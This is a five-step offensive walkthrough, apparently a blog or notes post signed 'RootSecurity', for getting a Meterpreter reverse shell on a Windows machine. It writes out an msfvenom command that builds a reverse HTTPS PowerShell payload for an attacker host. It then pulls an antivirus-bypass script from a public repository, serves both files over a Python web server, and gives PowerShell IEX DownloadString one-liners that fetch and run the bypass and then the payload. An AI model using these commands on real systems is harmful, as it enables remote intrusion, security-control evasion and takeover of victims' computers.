1. create MSFVENOM
msfvenom -p windows/x64/meterpreter/reverse_https -f psh LHOST=10.10.20.142 LPORT=443 > ‘/home/kali/http/https2.ps1’
2. copy raw from https://github.com/aloksaurabh/OffenPowerSh/tree/master/Bypass
curl https://raw.githubusercontent.com/aloksaurabh/OffenPowerSh/master/Bypass/Invoke-AlokS-AvBypass.ps1 > demo.ps1
3. python2 -m SimpleHTTPServer 80
4. IEX (New-Object Net.WebClient).DownloadString(‘http://10.10.20.142/demo.ps1’);Invoke-AlokS-AvBypass
5. IEX (New-Object Net.WebClient).DownloadString(‘http://10.10.20.142/https2.ps1’)
RootSecurity 